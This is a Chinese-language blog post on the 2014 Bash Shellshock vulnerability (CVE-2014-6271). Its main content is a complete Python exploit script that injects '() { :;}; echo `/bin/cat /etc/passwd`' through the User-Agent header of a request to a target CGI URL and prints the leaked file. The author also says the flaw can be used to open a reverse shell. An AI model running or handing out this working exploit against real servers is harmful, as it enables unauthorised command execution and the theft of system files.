首页 > Web安全 > Bash远程命令执行漏洞(CVE-2014-6271)分析利用
2014
09-26

Bash远程命令执行漏洞(CVE-2014-6271)分析利用

这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271),昨天参加完isc,晚上回家测试了一下,写了个python版本的测试小基本,贴上代码:

#coding:utf-8
import urllib,httplib
import sys,re,urlparse
#author:nx4dm1n
#website:http://www.nxadmin.com

def bash_exp(url):
    urlsp=urlparse.urlparse(url)
    hostname=urlsp.netloc
    urlpath=urlsp.path
    conn=httplib.HTTPConnection(hostname)
    headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}
    conn.request("GET",urlpath,headers=headers)
    res=conn.getresponse()
    res=res.getheaders()
    for passwdstr in res:
        print passwdstr[0]+':'+passwdstr[1]
        
    
if __name__=='__main__':
    
    #带http
    if len(sys.argv)<2:
        print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"
        sys.exit()
    else:
        bash_exp(sys.argv[1])

 

脚本执行效果如图所示:

Bash远程命令执行漏洞(CVE-2014-6271)分析利用 - 第1张  | 阿德马Web安全

也可以用burp进行测试。

关于此漏洞的详细分析可以参考以下文章,具体URL为:

http://www.cnblogs.com/LittleHann/p/3992778.html

利用该漏洞其实可以做很多事情,写的python小脚本只是执行了cat /etc/passwd。可以执行反向链接的命令等,直接获取一个shell还是有可能的。不过漏洞存在的条件也比较苛刻,测试找了一些,发现了很少几个存在漏洞。

 

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

Bash远程命令执行漏洞(CVE-2014-6271)分析利用》有 1 条评论

  1. IT疯狂女 说:

    长见识了,感谢博主的分享。

留下一个回复

你的email不会被公开。